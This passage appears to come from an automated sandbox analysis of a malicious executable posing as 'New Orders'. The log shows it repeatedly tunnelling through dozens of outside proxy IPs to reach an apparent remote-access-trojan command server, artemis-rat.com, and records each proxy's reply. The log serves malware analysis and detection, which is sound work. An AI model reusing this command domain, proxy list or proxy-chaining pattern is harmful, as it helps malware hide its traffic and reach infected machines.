                                                                                        610192.168.2.951843162.159.247.57807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.278994083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.441683054 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        611192.168.2.951840162.159.242.8807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.279109955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.441611052 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        612192.168.2.951860104.19.5.247807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.279408932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.435231924 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        613192.168.2.95163147.242.15.120156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.280112028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        614192.168.2.951624106.14.255.124807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.280287981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        615192.168.2.951886172.67.181.32807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.281558990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.437243938 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        616192.168.2.951891185.162.228.154807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282198906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.437613964 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        617192.168.2.951040132.148.16.169523267672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282414913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.476238966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477694035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.570346117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        618192.168.2.95161645.11.95.16550397672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282481909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.132586956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        619192.168.2.95175867.43.236.2067057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282543898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.458820105 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        620192.168.2.95120668.71.247.13041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282706022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        621192.168.2.951704200.108.190.389997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282743931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.599122047 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        622192.168.2.951646147.75.34.86100077672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.282860041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.589704037 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        623192.168.2.951665213.202.230.241807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.283148050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.600063086 CET733INHTTP/1.1 502 Proxy Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                        Content-Length: 551
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p><p>Additionally, a 502 Bad Gatewayerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        624192.168.2.951577183.88.212.18480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.283252001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.752834082 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        625192.168.2.95166037.187.77.58293807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.283699036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.960563898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.961184978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.961026907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773902893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.663985968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.461203098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.165390968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        626192.168.2.95177467.43.236.20131757672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.283699036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.866369009 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        627192.168.2.95184950.84.107.9481117672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.285626888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.835728884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.439012051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.726253986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222270012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.648386955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.132781029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.945270061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.445003033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        628192.168.2.951701218.252.244.126807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.285758972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.589910030 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


